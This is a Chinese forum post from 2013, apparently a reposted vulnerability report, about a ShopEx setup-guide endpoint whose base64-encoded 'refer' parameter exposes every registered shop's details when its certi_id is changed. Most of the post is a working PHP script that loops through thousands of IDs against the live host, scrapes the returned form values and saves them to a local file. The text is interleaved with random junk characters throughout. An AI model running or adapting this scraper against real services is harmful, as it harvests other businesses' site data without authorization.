|
|
简要描述:( {2 O& ^3 w' J p# e
ShopEx某接口缺陷,可遍历所有网站
/ [5 l/ k& B, T) Z1 `, L详细说明:
. c% l! k, F1 Z9 W6 S% I问题出现在shopex 网店使用向导页面
! s, I8 q) v! u+ T1 C* Q7 z/ k ?5 ?0 H& x- k+ I
3 Y7 N, C% Z- n k
8 }* w+ |2 `' Z+ w1 Z
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=8 B9 c8 R. \6 g0 Z4 D0 _$ k Q% v
, G8 s- f b0 A( c# D
: b! g! ]$ W1 p& ]6 u) ^4 e, G( R8 L2 [% J L; r. k4 L
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
, x* X, G7 L6 r1 R: m) J _7 i; j" _0 t j. C$ f$ N, s" H
" N7 M/ w! a6 Q. X
* L* b" j( N6 i% {$ a- y我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
3 v" i" ]/ r n5 `* V9 L4 z" y% D% k. H5 z K( L6 B- L/ m
5 F% H( G# y: B7 U. X6 |; X
( h8 l6 q |/ d! n1 K, S9 V- ^' I
<?php1 E( K! h4 N" A% x- N
$ c1 l; i( O" j2 k% O
for ($i=1; $i < 10000; $i++) { //遍历
& h, V4 t8 `2 m0 Z
: |$ _5 E6 [. S ShowshopExD($i);1 N2 c0 [1 p8 E
4 i0 j4 O, \" g& E
}9 n" M/ a% P9 U b' _5 l
* \" n6 j# i3 @! O$ K$ q
function ShowshopExD($cid) {
3 O6 D }$ Z9 ^0 x1 q# f. D) D( |; A! o, x- }
$url='http://guide.ecos.shopex.cn/step2.php';
: W5 K2 Y% [0 q5 N
! H/ g4 u Y' y* n $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}'); M7 P* C" E! d# d# L
9 c: r7 b. o7 E+ u( T
$url = $url.'?refer='.$refer;5 g8 d3 X2 u% E# s' P: F8 E x
' L. c2 G6 {/ k6 [" ]* C $ch = curl_init($url);3 h+ C/ t& ]- y2 M$ z/ I* U
5 ~( x) V4 O2 }# I
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;% h3 b6 E1 i4 `# D3 O
& q6 l7 x! z5 P6 }
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;5 U) {: s7 s1 w9 Q' I
, q. }' Y8 T+ `# m) l2 V" D' A% N
$result = curl_exec($ch);
B( v, Q2 O/ p& J: e% i& B/ A. n. M' ^" x; c# e& G
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
% L, ~! H' u. w" q( y# R: u7 k
7 C- s9 m( j% s( M: K; @( `' o! d if(strpos($result,$refer))
1 D0 V8 R% U, U8 o
' a+ t3 f, L+ o V1 g {
% D0 V7 [; J4 @# i
7 z& a( F; R3 M1 B: ], [3 R5 N; g $fp = fopen("c:/shopEx.txt",'ab'); //保存文件4 q# M5 d) c; E; I8 Z
7 ]/ t/ V+ y9 D preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);% ~ x7 b, C% }$ `4 Y: g
! L8 w) B3 {5 b' y& I. B6 c" m foreach ($value[1] as $key) {
0 u( {, b% Z3 F6 V9 N3 |0 ?7 @! X8 [$ O4 a$ E/ X6 h7 ?9 ~
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
* A& r; q, E1 U' U% j h. o, V% O, @8 o: J- d# A6 b
echo $res[1][0].':'.$res[3][0]."\r\n";
4 ^) y+ D4 |9 e8 W: ?* [! y9 V' {3 {: f1 `: w! u
$col =$res[1][0].':'.$res[3][0]."\r\n"; 4 `( u: s. y) H/ ]
- l) V5 ]8 Z# P4 J8 x/ w fwrite($fp, $col, strlen($col)); * T, N. x' J7 A8 |( c) J: [
/ s5 u3 F5 l& m' U* v }
* q* ]3 e1 [, k7 w
6 @2 n, j0 ` y& J9 w) d9 y A: c echo '--------------------------------'."\r\n";
4 [7 j, z0 T3 N1 F7 w
3 v9 J6 |3 m! K' w fclose($fp);
+ _9 ?" ^! |( z4 v
) [# A* } f# \ }
6 o+ h& C* h; x4 M* L) J _8 f" ~% k* @- M0 Y% c. d7 y
flush();/ S q& g# A8 K- D; I6 K8 q x
9 ^7 [6 w \& S! m* x# j' e2 L, I curl_close($ch);
0 R* n, V" `- ]2 i1 V
( z" ?* ~5 y* n3 r8 u: s! d }
& M! x8 A {7 b" t( c
5 d; B! J0 J+ Y! N; [+ Y( D?>
# Z% e& J! D3 J* C5 I; n6 D; t漏洞证明:% r/ w1 C5 B7 R H( z$ d+ P) ]
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg* ]/ N& a* R; b/ k
refer换成其他加密方式9 n. ^4 v8 a. y" I
|
|
发表于 2013-9-21 15:59:47
收藏
支持
反对